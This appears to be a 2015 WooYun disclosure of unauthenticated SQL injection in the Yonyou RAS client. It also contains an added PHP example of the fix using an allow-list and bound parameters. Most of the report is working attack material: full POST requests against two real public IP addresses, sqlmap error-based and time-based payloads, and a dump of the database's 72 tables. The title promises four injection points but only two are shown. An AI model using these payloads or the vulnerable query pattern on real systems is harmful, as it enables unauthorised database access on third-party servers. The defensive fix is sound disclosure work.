
Four SQL injection points in a Yonyou client affect many systems (no login required, DBA privileges)

2015-09-07 04:15

Yonyou Software RAS Standard Edition client (remote rapid application access)



SQL injection is reachable without logging in.



First location:

Code block:
POST /server/cmxpagedquery.php?pgid=AppList&SearchFlag=true HTTP/1.1
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Referer: http://116.236.131.194:8080/
Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E
Host: 116.236.131.194:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: --user-agent "Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0"
Accept: */*

AppID%5b-1%5d=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8&ViewAppValue=1



Both the ViewAppFld and ViewAppValue parameters are injectable.



Second location:

Code block:
POST /server/cmxfolder.php?pgid=AppList&SearchFlag=true&t=1433251155 HTTP/1.1
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Referer: http://218.31.33.44:8888/
Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E
Host: 218.31.33.44:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1&ViewAppValue=1



Both the ViewAppFld and ViewAppValue parameters are injectable.

Proof of vulnerability:

[Five screenshots of the sqlmap results, not reproduced here]





Code block:
---
Parameter: ViewAppFld (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT 4416 FROM(SELECT COUNT(*),CONCAT(0x716a787871,(SELECT (ELT(4416=4416,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6748=6748&ViewAppValue=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT * FROM (SELECT(SLEEP(30)))porO) AND (5447=5447&ViewAppValue=1
---
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
current database: 'rasdatabase'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ViewAppFld (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT 4416 FROM(SELECT COUNT(*),CONCAT(0x716a787871,(SELECT (ELT(4416=4416,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6748=6748&ViewAppValue=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT * FROM (SELECT(SLEEP(30)))porO) AND (5447=5447&ViewAppValue=1
---
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
Database: rasdatabase
[72 tables]
+---------------------------+
| hbadminrolegroupmembers   |
| hbadminrolerestrictedorgs |
| hbadminroletask           |
| hbadminroleusermembers    |
| hbclientgroupapplication  |
| hbclientgroupprinter      |
| hbdirectoryapplication    |
| hborgapplication          |
| hborglicensepolicy        |
| hborgpolicy               |
| hbpolicyvalues            |
| hbroletask                |
| hbserverapplication       |
| hbserverprinterdriver     |
| hbserverprintinf          |
| hbserverrole              |
| hbservertask              |
| hbtaskaction              |
| hbtaskcondition           |
| hbuserapplication         |
| hbuserdirectory           |
| hbuserorgs                |
| hbuserpolicy              |
| lograsarchi               |
| lograsconcurrenta         |
| lograsconcurrentus        |
| lograsent                 |
| lograssessi               |
| lograstaskactionhist      |
| lograstaskhist            |
| oemuserinfo               |
| rasactions                |
| rasadminroles             |
| rasadmintasks             |
| rasapplication            |
| rasbadprinterdriver       |
| rascfg                    |
| rasclient                 |
| rasclientgroup            |
| rascompatibilitydriver    |
| rasconcurrentsession      |
| rasconditions             |
| rasconnectionsetting      |
| rasdatabase               |
| rasdirectory              |
| rasdmzserverd             |
| rasdomain                 |
| rasgroupuser              |
| rasinfocollectordata      |
| rasjobs                   |
| rasjobsteps               |
| raslicenseinfo            |
| raslicensetoken           |
| raslicpolicy              |
| raslockdownpolicies       |
| rasmonthlyminute          |
| rasorgs                   |
| rasprinter                |
| rasprinterdriver          |
| rasproductk               |
| rasreqids                 |
| rasroles                  |
| rasrunningservers         |
| rasselection              |
| rasserver                 |
| rasstyle                  |
| rastasks                  |
| rasticketing              |
| rastimedsessio            |
| rasuser                   |
| rasusermng                |
| usermachines              |
+---------------------------+


Fix recommendation:

Filter the input.
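The fix, worked out as an added example rather than code from the Yonyou RAS client: the concatenation shape that the sqlmap payloads imply (the parameter lands unquoted inside a parenthesised WHERE clause) beside a hardened handler that resolves ViewAppFld through an allow-list and binds ViewAppValue as a parameter. The table and column names (rasapplication, DisplayName, Description), the ViewAppFld code-to-column map and the SQLite demo data are assumptions for illustration.

```php
<?php
// Added example, not code from the Yonyou RAS client. Column/table names and the
// ViewAppFld code-to-column map are assumptions made for illustration.

// Vulnerable shape: a payload such as "8) AND (...) AND (1=1" only works
// because the raw parameter is concatenated, unquoted, inside the parentheses.
function buildQueryVulnerable(array $post): string
{
    $fld = $post['ViewAppFld'] ?? '';
    $val = $post['ViewAppValue'] ?? '';
    return "SELECT * FROM rasapplication WHERE (FieldID = $fld AND Value = '$val')";
}

// Hardened: the field selector must be an integer that maps to a column we
// control (identifiers cannot be bound), and the value is bound as a parameter.
const APP_SEARCH_FIELDS = [1 => 'DisplayName', 8 => 'Description'];

function searchAppsSafe(PDO $db, array $post): array
{
    $fld = filter_var($post['ViewAppFld'] ?? '', FILTER_VALIDATE_INT);
    if ($fld === false || !isset(APP_SEARCH_FIELDS[$fld])) {
        throw new InvalidArgumentException('ViewAppFld is not a known field id');
    }
    $column = APP_SEARCH_FIELDS[$fld];
    $stmt = $db->prepare("SELECT DisplayName, Description FROM rasapplication WHERE $column = :val");
    $stmt->bindValue(':val', (string) ($post['ViewAppValue'] ?? ''), PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demo against an in-memory SQLite database with constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE rasapplication (DisplayName TEXT, Description TEXT)');
$db->exec("INSERT INTO rasapplication VALUES ('Notepad', 'text editor')");

$tampered = ['ViewAppFld' => '8) AND (1=1', 'ViewAppValue' => '1'];
echo buildQueryVulnerable($tampered), "\n";   // attacker text becomes SQL
try {
    searchAppsSafe($db, $tampered);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n"; // never reaches the database
}
// Legitimate lookup: field 1 (DisplayName) equal to "Notepad" returns one row.
print_r(searchAppsSafe($db, ['ViewAppFld' => '1', 'ViewAppValue' => 'Notepad']));
```

The same allow-list treatment applies to the sort and sortType parameters, since an ORDER BY column name cannot be bound as a parameter either.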

Source: www.wooyun.org/bugs/wooyun-2015-0117999
